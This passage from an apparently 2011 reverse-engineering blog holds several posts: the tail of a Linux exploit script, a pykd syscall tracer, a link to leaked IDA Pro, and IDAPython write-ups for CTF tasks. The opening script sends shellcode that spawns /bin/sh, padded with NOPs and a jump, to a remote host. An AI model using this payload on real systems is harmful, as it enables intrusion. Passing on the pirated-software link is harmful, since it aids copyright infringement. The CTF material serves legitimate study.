<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>2f<span style="color: #000099; font-weight: bold;">\x</span>2f<span style="color: #000099; font-weight: bold;">\x</span>73<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>2f"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>62<span style="color: #000099; font-weight: bold;">\x</span>69<span style="color: #000099; font-weight: bold;">\x</span>6e<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e3<span style="color: #000099; font-weight: bold;">\x</span>8b<span style="color: #000099; font-weight: bold;">\x</span>54<span style="color: #000099; font-weight: bold;">\x</span>24"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>08<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>0b<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>99"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>90"</span><span style="font-size: small;"> </span><span style="color: #66cc66; font-size: small;">*</span><span style="font-size: small;"> </span><span style="color: black; font-size: small;">(</span><span style="color: orangered; font-size: small;">261</span><span style="font-size: small;"> - </span><span style="color: green; font-size: small;">len</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">shell</span><span style="color: black; font-size: small;">)</span><span style="color: black; font-size: small;">)</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">print</span><span style="font-size: small;"> </span><span style="color: green; font-size: small;">len</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">shell</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>e9<span style="color: #000099; font-weight: bold;">\x</span>f7<span style="color: #000099; font-weight: bold;">\x</span>fe<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>ff"</span><br />
<span style="font-size: small;">sock = </span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: crimson; font-size: small;">socket</span><span style="color: black; font-size: small;">(</span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: black; font-size: small;">AF_INET</span><span style="font-size: small;">, </span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: black; font-size: small;">SOCK_STREAM</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">connect</span><span style="color: black; font-size: small;">(</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">HOST, PORT</span><span style="color: black; font-size: small;">)</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">str1 = </span><span style="color: darkslateblue; font-size: small;">'+'</span><span style="font-size: small;">+ shell + </span><span style="color: darkslateblue; font-size: small;">"|<span style="color: #000099; font-weight: bold;">\n</span>"</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">print</span><span style="font-size: small;"> str1</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">send</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">str1</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">str2 = </span><span style="color: darkslateblue; font-size: small;">'-'</span><span style="font-size: small;">+ shell + </span><span style="color: darkslateblue; font-size: small;">"|<span style="color: #000099; font-weight: bold;">\n</span>"</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">send</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">str2</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">close</span><span style="color: black; font-size: small;">(</span><span style="color: black; font-size: small;">)</span></div></span><br />
</span><br />
<br />
</span></div>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com4tag:blogger.com,1999:blog-5377378398297854379.post-19508842855131098872011-07-20T12:04:00.000-07:002012-07-31T06:35:29.957-07:00PykdTraceCiss Hot Summer has a lot of different ways to do, but I choose bug hunting and trace building.<br />
Some researches make trace with Temu, some use debuggers: MyNav, ProcessStalker. But, for kernel purpose, as you know, we need to use WinDbg. Big advantage that Windbg works everywhere. <br />
It’s not a secret that kernel researches use Windbg for rootkit hunting and Analyzing. You can find a lot of scripts in <a href="http://kdar.codeplex.com/">KDAR</a> project. <br />
But It’s not comfortable to use Windbg script, so <a href="http://pykd.codeplex.com/">pykd</a> project was born.<br />
Today I would like to present you small overview of pykd and <a href="https://github.com/antoxar/pykd_trace">my own script</a> for tracing syscalls.<br />
<span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><span class="fullpost">Let’s start from installing. I can install only version for python 2.7. Another version didn’t work in my Win (It doesn’t work with any VCRedist).</span><br />
<span class="fullpost">If you installing it from setup packet you already have different examples. If you install only *.pyd file, download it, because documentation on his site is sparse. It’s time to make some experiments.</span><br />
<blockquote><span class="fullpost"><span class="fullpost"><i><span style="font-family: "Courier New",Courier,monospace;">.load pykd.pyd</span></i> - load extension in WinDbg.</span></span></blockquote><blockquote><span class="fullpost"><span class="fullpost"><i><span style="font-family: "Courier New",Courier,monospace;">!py name.py</span></i> – starting script. Don’t forget to set PYTHONPATH because otherwise any dependencies will not work.</span></span></blockquote><span class="fullpost"><span class="fullpost"> Have fun? …<br />
As any debugger tracer, it’s necessary to insert breakpoints and handle them. Pykd has bp class. Handler must return DEBUG_STATUS_GO or DEBUG_STATUS_GO_HANDLER, to continue execution or stopping.<br />
</span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost">bp<span class="br0">(</span> nt.<span class="me1">DbgPrint</span>, Handler<span class="br0">)</span></span></span></div></blockquote><span class="fullpost"><span class="fullpost">Then you should type go() in you script. Pykd set bp only after immediately start.<br />
Next task is monitoring creating process and his child’s. You can find many different ways, but I’d like to control PspInsertProcess and PspProcessDelete. These functions append and remove EPROCESS to\from PsActiveProcessList. In my script I create a BPHandler class which contains handlers for Processes and Syscalls bps. Syscall bps enables when you process with <process_name> started. For this purpose pykd has typeVar class. <br />
</process_name></span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost">eprocess = typedVar<span class="br0">(</span><span class="st0">"nt"</span>, <span class="st0">"_EPROCESS"</span>, reg<span class="br0">(</span>“eax”<span class="br0">)</span></span></span></div></blockquote><span class="fullpost"><span class="fullpost">And you can use eprocess like a structure - eprocess.UniqueProcessId. <br />
In Syscall handler we needs to get eprocess too. In this case I’d like to show you another command – dbgCommand<br />
</span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost"><span class="kw1">def</span> GetCurrentProcess<span class="br0">(</span><span class="kw2">self</span><span class="br0">)</span>:</span></span><br />
<span class="fullpost"><span class="fullpost"><span class="kw2">str</span> = dbgCommand<span class="br0">(</span><span class="st0">".printf <span class="es0">\"</span>%x<span class="es0">\n</span><span class="es0">\"</span>, poi(poi(fs:[0x124])+0x50)"</span><span class="br0">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span class="kw1">return</span> <span class="kw2">int</span><span class="br0">(</span><span class="kw2">str</span>, <span class="nu0">16</span><span class="br0">)</span></span></span></div></blockquote><span class="fullpost"><span class="fullpost">Starting script </span></span></div><div style="font-family: "Courier New",Courier,monospace; text-align: left;"><span class="fullpost"><i><span class="fullpost"><process_name>!py pykdtrace.py dropper</process_name></span></i></span></div><div><span class="fullpost"><span class="fullpost"><process_name> and any droppers in VMware and go to sleep. <br />
</process_name></span></span><br />
<blockquote><span class="fullpost"><span class="fullpost">f60:nt!NtAlpcConnectPort</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span></blockquote><span class="fullpost"><span class="fullpost">Wake up and see big log file. Result of syscall I’m using for some metamorphic experiments, but it can be used for tracing drivers and so on. Change GetSyscallList function and get another Bp list for your purpose.<br />
<br />
Looks pretty simple. But I have few remarks:<br />
</span></span><br />
<ul style="text-align: left;"><li><span class="fullpost"><span class="fullpost"><process_name> Pykd doesn’t show me python exceptions (print debug engine works fine. It’s makes me crazy)</process_name></span></span></li>
<span class="fullpost">
<li><span class="fullpost"><process_name>Pykd doesn’t call destructor of any classes.( So It doesn’t deleted bp and doesn’t close file, when I stopping it by initial break.)</process_name></span></li>
<li><span class="fullpost"><process_name> Pykd is slow engine for tracing purposes, But for rootkit hunting it’s really good things.</process_name></span></li>
</span></ul><span class="fullpost"><span class="fullpost"><process_name> <br />
Another experiment with kernel tracing I will make with Ida and some IoCtl handler. <br />
<br />
Good Luck.<br />
<br />
P.S. I’m think that windows driver for temu is big. It’s my fault. You can see him for Win 7 from Linux driver developer in <a href="https://github.com/olshanov/temu_testdrv_win7">Olshanov repository</a>. <br />
</process_name></span></span></div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com2tag:blogger.com,1999:blog-5377378398297854379.post-9154170770737432672011-07-13T13:15:00.000-07:002011-07-18T12:58:00.107-07:00IDA Pro 6.1 + HexRays 1.5 leakedlong-awaited leaked.<br />
<span class="fullpost"><br />
IDA Pro 6.1 + HexRays 1.5 leaked: <a href="http://t.co/EXqytpT">http://t.co/EXqytpT</a> (sendspace.com). <br />
Epic story: <a href="http://t.co/n7awBas">http://t.co/n7awBas</a> (rus)<br />
</span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-58618929751700304932011-06-02T07:04:00.000-07:002011-07-20T12:46:26.797-07:00Unpacked bootmgr x86 part<div dir="ltr" style="text-align: left;" trbidi="on">Unpacked <a href="https://docs.google.com/leaf?id=0Bw72cstp5cGsMzcwZGZjMmEtOWQ1YS00ZThhLWJjN2MtMmM3NmEyNjA3OTY1&hl=ru&authkey=CImPpPMB">bootmgr</a><span class="fullpost"><br />
First 5 sections is correct. Other segments are wrong. But anymore IDA can associate it with pdb.</span><br />
<br />
<span class="fullpost">This version is check Win 7 Sp0. You also can find free version or asking me. </span><br />
<span class="fullpost">Also there are small differences after ms-advisory-2506014-x64. </span></div>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com2tag:blogger.com,1999:blog-5377378398297854379.post-84481410084500666462011-04-12T13:59:00.000-07:002011-07-20T12:22:20.781-07:00IDAPython and CTF Task<span lang="EN-US">Few month ago I read post “IDA + Python = Love” in “Hacker” journal and been a pist off, because it is translate from <a href="http://www.blogger.com/goog_1221386706" style="color: black;">HexBlog </a></span><span class="author"><span lang="EN-US">and didn't told about another cool IDAPython feature – <a href="http://www.hexblog.com/?p=113" style="color: black;">Appcall</a>, which appear in IDA 5.6. Here is <a href="http://www.hex-rays.com/idapro/debugger/appcall.pdf" onclick="if(!confirm('Open this file with Google Docs?'))return true;window.location='http://docs.google.com/gview?url='+this.href;return false;" style="color: black;">user guide</a>.</span></span><br />
<blockquote>Appcall is a mechanism used to call functions inside the debugged program from the debugger or your script as if it were a built-in function. </blockquote>So you don't need a <a href="http://docs.python.org/library/ctypes.html" style="color: black;">ctypes</a> for simple operations.<br />
<br />
<span class="author"><span lang="EN-US"></span></span><br />
<div style="font-family: Georgia,"Times New Roman",serif;"><b><span lang="EN-US" style="font-size: small;">Today I will show how you can use this technics in different CTF tasks with IDA 6.0 demo. </span></b></div><br />
<span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><hr /><div style="text-align: center;"><b>RuCTF2009 Quals Reverse 100</b></div><hr /><br />
<span lang="EN-US">Every CTF quals we have interesting reverse task with Brute Force. Let's get </span><a href="http://ructf.org/2009/documentation/quals/81.xml">reverse 100</a> from RuCTF quals 2009.<br />
<span lang="EN-US"></span><br />
<span lang="EN-US">It was pretty simple binary with </span><span lang="EN-US">checking string</span><span lang="EN-US"> function.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0M-ikq4D6u6Yp7EppkvGiGT8_ddZUPlx75PdO_7QgiJ3toYAA1MWFKUaALVBwdnGH98GibmPQD49yOQI35yVgs-f2IfoHg2vdrQQCIJ96FEGOskS_5xZjuUcD73l9pcYZywtE9B0EZRo/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0M-ikq4D6u6Yp7EppkvGiGT8_ddZUPlx75PdO_7QgiJ3toYAA1MWFKUaALVBwdnGH98GibmPQD49yOQI35yVgs-f2IfoHg2vdrQQCIJ96FEGOskS_5xZjuUcD73l9pcYZywtE9B0EZRo/s1600/Capture.JPG" /></a></div><div align="center" style="text-align: center;"><br />
<span lang="EN-US"></span></div>First of all start debugger and open python command line.<br />
<ol style="text-align: left;"><li>Initialize Appcall object - find a function by name and confront prototype.</li>
<li>Find String pointer with IDC <span style="color: #b45f06;">LocByName</span> function and patch them by <span style="color: #b45f06;">PutDataList<span style="color: black;">.</span></span></li>
<li><span style="color: #b45f06;"><span style="color: black;">Initialize permutation object and start the script. </span></span></li>
</ol><div class="python"><span class="kw1">import</span> <span class="kw3">string</span><br />
<span class="kw1">from</span> idautils <span class="kw1">import</span> PutDataList<br />
<span class="kw1">from</span> idc <span class="kw1">import</span> LocByName<br />
<span class="kw1">from</span> <span class="kw3">itertools</span> <span class="kw1">import</span> product<br />
<br />
brute = Appcall.<span class="me1">proto</span><span class="br0">(</span><span class="st0">"brute_f"</span>, <span class="st0">"int __cdecl brute_f();"</span><span class="br0">)</span><br />
<br />
<span class="kw1">def</span> patchString<span class="br0">(</span> val <span class="br0">)</span>:<br />
PutDataList<span class="br0">(</span> LocByName<span class="br0">(</span><span class="st0">'string'</span><span class="br0">)</span>, <span class="kw2">map</span><span class="br0">(</span> <span class="kw1">lambda</span><span class="br0">(</span>i<span class="br0">)</span>:<span class="kw2">ord</span><span class="br0">(</span>i<span class="br0">)</span>, val<span class="br0">)</span><span class="br0">)</span><br />
<br />
<span class="kw1">for</span> i <span class="kw1">in</span> <span class="kw2">xrange</span><span class="br0">(</span><span class="nu0">3</span><span class="br0">)</span>:<br />
<span class="kw1">for</span> <span class="kw2">str</span> <span class="kw1">in</span> product<span class="br0">(</span> <span class="kw3">string</span>.<span class="me1">letters</span> + <span class="kw3">string</span>.<span class="me1">digits</span>, repeat=i<span class="br0">)</span>:<br />
patchString<span class="br0">(</span><span class="kw2">str</span><span class="br0">)</span><br />
<span class="kw1">if</span> brute<span class="br0">(</span><span class="br0">)</span> == <span class="nu0">1</span>:<br />
<span class="kw1">print</span> <span class="st0">''</span>.<span class="me1">join</span><span class="br0">(</span><span class="kw2">str</span><span class="br0">)</span></div></div><br />
In console menu you can see results:<br />
<blockquote><b>aF nh oY p4 rV sg D5 FW Gf HH Iy Tv UG Zi 18 2k 3Z</b></blockquote><br />
<hr /><div style="text-align: center;"><b>RuCTF2009 Quals Reverse 200</b></div><hr /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s1600/Capture.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s200/Capture.JPG" width="200" /></a></div> <br />
Another Example, It's necessary to call some function with different parameters. Look at <span lang="EN-US"><a href="http://ructf.org/2009/documentation/quals/81.xml" style="color: black;"> reverse 200</a> in RuCTF quals 2009. </span><span lang="EN-US">We have a hex string </span><b>0408151623426C12 </b>and dll. Find a upper function in Graph mode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGxpIDaNm-X057QzQ5_hxk4ty_1ypUoiLydAUDkJRBNkBybbo4Vfb-8oer0bMFL16V5q5dbek5U7dNn-8_IiHYO3bc4SunzMdfSMIYYIhuHSPOywqiqg6SFCC3TnRmd0IlN4srD6XwH0I/s1600/Capture.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGxpIDaNm-X057QzQ5_hxk4ty_1ypUoiLydAUDkJRBNkBybbo4Vfb-8oer0bMFL16V5q5dbek5U7dNn-8_IiHYO3bc4SunzMdfSMIYYIhuHSPOywqiqg6SFCC3TnRmd0IlN4srD6XwH0I/s1600/Capture.JPG" /></a></div><br />
<br />
<br />
If you have a Hex-Rays(or IDA 5.5) you can decompile it and get a function prototype. Here is it<br />
<blockquote><i style="color: #b45f06;"><span style="font-family: Verdana,sans-serif; font-size: small;"><span style="color: black;">int __fastcall func(char *, char *, char *);</span></span><span style="color: black;"> </span></i></blockquote><i style="color: #b45f06;"><span style="color: black;"> </span></i><span style="color: #b45f06;"><span style="color: black;">Presence of ca</span></span><span style="color: #b45f06;"><span style="color: black;">lling </span></span><span style="color: #b45f06;"><span style="color: black;">convention is obligatory.</span></span><br />
<br />
<br />
<br />
<br />
<span style="color: #b45f06;"><span style="color: black;"> </span></span><br />
<br />
<span style="color: #b45f06;"><span style="color: black;">Like in last example</span></span><br />
<ol style="text-align: left;"><li><span style="color: #b45f06;"><span style="color: black;">initializing Appcall object</span></span></li>
<li><span style="color: #b45f06;"><span style="color: black;">creating input and output buffers. </span></span></li>
<li><span style="color: #b45f06;"><span style="color: black;">calling function</span></span></li>
</ol><br />
<div class="python"><span class="kw3">test</span> = Appcall.<span class="me1">proto</span><span class="br0">(</span><span class="st0">"func"</span>, <span class="st0">" int __fastcall func(char *, char *, char *);"</span><span class="br0">)</span><br />
bufin = Appcall.<span class="me1">buffer</span><span class="br0">(</span> <span class="st0">"<span class="es0">\x</span>04<span class="es0">\x</span>08<span class="es0">\x</span>15<span class="es0">\x</span>16<span class="es0">\x</span>23<span class="es0">\x</span>42<span class="es0">\x</span>6C<span class="es0">\x</span>12"</span><span class="br0">)</span><br />
buffout1 = Appcall.<span class="me1">buffer</span> <span class="br0">(</span> <span class="st0">"<span class="es0">\x</span>00"</span> <span class="sy0">*</span> <span class="nu0">15</span> <span class="br0">)</span><br />
buffout2 = Appcall.<span class="me1">buffer</span> <span class="br0">(</span> <span class="st0">"<span class="es0">\x</span>00"</span> <span class="sy0">*</span> <span class="nu0">15</span> <span class="br0">)</span><br />
<span class="kw3">test</span><span class="br0">(</span> bufin, buffout1, buffout2 <span class="br0">)</span><br />
<span class="kw1">print</span> buffout1.<span class="me1">value</span>.<span class="me1">encode</span><span class="br0">(</span><span class="st0">'hex'</span><span class="br0">)</span></div></div><br />
Result: <b>69da2403d2416d3c8042625839d400 </b><br />
<br />
<br />
<hr /><div style="text-align: center;"><b>Codegate 2011 Quals Issue 500 </b></div><hr /><br />
Since I starting interesting boot code in Windows, I use bochs for any researches. Support of bochs in IDA start from 5.4 version. IDA 5.5 can works only with bochs 2.3.7, because can't get register information from new versions. IDA 6.0 with IDA 5.5 plugins of bochs works fine with 2.4.5.<br />
<br />
I didn't make this task in CTF time, but I have a one interesting decision method. You can read detailed write up on <a href="http://leetmore.ctf.su/wp/codegate-ctf-2011-issue-500-bootsector/">Leet More blog</a>.<br />
<br />
First of all lets make bochsrc file for issue500.bin.<br />
A already has <a href="https://docs.google.com/leaf?id=0Bw72cstp5cGsZTExYTgxMGItOWFlMS00YzIyLTkyMWYtYjg5ZDAzMTZhOGEy&hl=ru&authkey=CLLphJcM">one</a>. This example works fine in 2.4 and 2.3. For you purpose only modify string as you need<br />
<br />
<blockquote><div class="python"><div style="text-align: left;">ata0-master: type=disk, mode=flat, translation=auto, path="$CODEGATE\iss500\issue500.bin", cylinders=6500, heads=255, spt=63, biosdetect=auto, model="test" </div></div></blockquote><br />
Next step is starting IDA with bochs. Unfortunately I don't have full IDA version upper then 5.5. And can't use Appcall. IDA 6.0 demo send me this screen. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3Fzqxbivx5vzkeB4pSblwkqG5hyphenhyphenO8sTkWuQIyWLiH4UomRPwavmCvAkA-xfK3sgk8vfTBVL-Kek52KlQkMeEo-_gwUl7_-cekeidZzwJR0e_Mzb1AoBmlF1paOPnRDjKeLQIW5aoiSg/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3Fzqxbivx5vzkeB4pSblwkqG5hyphenhyphenO8sTkWuQIyWLiH4UomRPwavmCvAkA-xfK3sgk8vfTBVL-Kek52KlQkMeEo-_gwUl7_-cekeidZzwJR0e_Mzb1AoBmlF1paOPnRDjKeLQIW5aoiSg/s320/Capture.JPG" width="320" /></a></div><br />
So I will talk about IDA 5.5 in this section and if you have newer version PLEASE check Appcall for 16bit code. I hope it will works fine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYqWxZaDUvFOUBsSEjCRJbFEM8BGOn3IlnBx5rgcLDjypVZKExtUwULJ5_vrGR62u7jZIkRQlmSTn0XeRuyJz1_0wSY8juwmXN3ORMgcpCMmyzMIV2NchmZuN3uafN_-RThE0E65g5H0/s1600/Capture.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYqWxZaDUvFOUBsSEjCRJbFEM8BGOn3IlnBx5rgcLDjypVZKExtUwULJ5_vrGR62u7jZIkRQlmSTn0XeRuyJz1_0wSY8juwmXN3ORMgcpCMmyzMIV2NchmZuN3uafN_-RThE0E65g5H0/s320/Capture.JPG" width="320" /></a></div><br />
Starting IDA. Then i main menu choose Debugger->Run->Local Bochs Debugger.<br />
In next window choose full path to *.bxrc file.<br />
Next step is "Debug options->Set speciefic options" <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Y0bgLlIWz3bVoCs39L2pR0hefkdz4IArdoaZyP7sSv_hBCw9VD8mdbzt4xCzOpYzNZG_mbbCMifeVGtDF0-qPo9psnAw_tTPjUoNE4ijYNuLbNt-tFcDsIOAlNvu-VH2Ezp8bBZ6OQg/s1600/Capture.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Y0bgLlIWz3bVoCs39L2pR0hefkdz4IArdoaZyP7sSv_hBCw9VD8mdbzt4xCzOpYzNZG_mbbCMifeVGtDF0-qPo9psnAw_tTPjUoNE4ijYNuLbNt-tFcDsIOAlNvu-VH2Ezp8bBZ6OQg/s320/Capture.JPG" width="320" /></a></div>Set full path to bochsdbg.exe, and choose Disk image.<br />
That's all preferences which we need. Start debugger and wait until IDA create db. Then bochs told you about bad disk geometry - push continue. And then you image will ask you a password. Look at the call stack and find "debug#" segment. Put bp after "int" and push enter.<br />
<br />
Now you are in input pass function and lower a pass checker function. At the picture you can see this simple function, which called for each simbol. DX started from 0 and after all symbols must be 0x2002.<br />
You can write algorithm on python or C, but it cool - use debugger for brute.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvYEOaBO3XQXyRTHmM5eAkw5cox3M9eAjY0z4tUzgFf3I4ZQLW3lnHHl4MYcJ6ME2V03hiC3sxQ6xqiaheLDoaAKS3yiqzG22-ySs1Z263CXzki_w_1Z3upRf3ehEM5Or0SjKpnvuosI/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvYEOaBO3XQXyRTHmM5eAkw5cox3M9eAjY0z4tUzgFf3I4ZQLW3lnHHl4MYcJ6ME2V03hiC3sxQ6xqiaheLDoaAKS3yiqzG22-ySs1Z263CXzki_w_1Z3upRf3ehEM5Or0SjKpnvuosI/s1600/Capture.JPG" /></a></div>Please check it in newer version of IDA and give me know.<br />
<br />
<br />
<hr /><div style="text-align: center;"><b>RuCTF 2011 Quals Reverse 300 </b></div><hr /><br />
Really crazy task with brute. I will show you script for my first idea about this task. Shortly we have a binary, which want 10 symbols string which satisfy claims of sub_40181A(brute_f). This function check input string with table started from 0x403182. Indexing in dict and so on makes me crazy so I make a script which reverse function execution. It means that we get a last value - 0xD4, find it in dictionary, calculate offset and search it again.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s1600/Capture.JPG" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br />
</a></div></div></div><br />
<div class="python">start = <span class="st0">"D4"</span><br />
outstr = <span class="st0">""</span><br />
<span class="kw1">import</span> <span class="kw3">string</span><br />
strOld = <span class="st0">"23456789TJQKAhscd "</span><br />
start_offset = LocByName<span class="br0">(</span><span class="st0">"dict"</span><span class="br0">)</span><br />
<span class="kw1">for</span> i <span class="kw1">in</span> <span class="kw2">xrange</span><span class="br0">(</span>0xa<span class="br0">)</span>:<br />
offset = FindBinary<span class="br0">(</span> LocByName<span class="br0">(</span><span class="st0">"dict"</span><span class="br0">)</span>,SEARCH_DOWN, start<span class="br0">)</span> - start_offset<br />
<span class="kw1">print</span> <span class="st0">"VA %x RVA %x"</span> <span class="sy0">%</span> <span class="br0">(</span>offset + start_offset, offset<span class="br0">)</span><br />
<span class="kw1">for</span> i <span class="kw1">in</span> <span class="kw2">xrange</span><span class="br0">(</span>0x13<span class="br0">)</span>:<br />
val = <span class="br0">(</span>offset - <span class="br0">(</span> i <span class="sy0">>></span> <span class="nu0">1</span> <span class="br0">)</span><span class="br0">)</span> / <span class="br0">(</span> <span class="nu0">2</span> <span class="sy0">*</span> 0x13 <span class="br0">)</span><br />
<span class="kw1">if</span> <span class="br0">(</span>val <span class="sy0">*</span> <span class="br0">(</span> 0x13 <span class="sy0">*</span> <span class="nu0">2</span><span class="br0">)</span> + i <span class="sy0">*</span> <span class="nu0">2</span><span class="br0">)</span> == offset:<br />
